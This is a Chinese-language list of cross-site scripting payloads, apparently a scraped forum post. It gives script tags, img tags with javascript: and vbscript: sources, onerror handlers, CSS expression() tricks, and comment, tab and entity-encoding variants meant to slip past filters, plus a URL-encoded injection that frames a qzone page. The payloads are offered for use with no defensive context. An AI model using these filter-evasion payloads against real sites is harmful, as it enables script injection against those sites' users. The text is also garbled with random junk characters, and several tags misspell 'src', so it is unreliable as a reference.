<script>alert("跨站")</script> (最常用)8 \/ b) w% u. e) g- {3 x' c
<img scr=javascript:alert("跨站")></img>: {) _' x& b4 a' s
<img scr="javascript: alert(/跨站/)></img>" l* O6 W* ^1 G
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
. K3 A3 U6 N( B! e! A<img scr="#" onerror=alert(/跨站/)></img>5 }' p9 v! Y1 {# y2 Y4 E2 H! f
<img scr="#" style="xss:expression(alert(/xss/));"></img>
7 x' G9 F! t, u0 v% \<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
6 y2 b4 s* ^$ t7 r% D- R3 f<img src=vbscript:msgbox ("xss")></img>
$ L* I9 u* T* c- i5 b<style> input {left:expression (alert('xss'))}</style>
, S$ M8 O3 T7 W) j# K<div style={left:expression (alert('xss'))}></div>" W3 s' Q$ w( q& s# H
<div style={left:exp/* */ression (alert('xss'))}></div>0 O' K, Y) h I/ Y |" {4 ~
<div style={left:\0065\0078ression (alert('xss'))}></div>9 g( ?) N$ L3 l& r) N/ o p6 F
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>" _* W) P+ {0 c# a
unicode <div style="{left:expRessioN (alert('xss'))}">
I8 a7 k& q8 m, S; K( B; ]& f. w0 L& D9 a+ K
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
$ d }4 l" g2 U& P1 u( j9 i |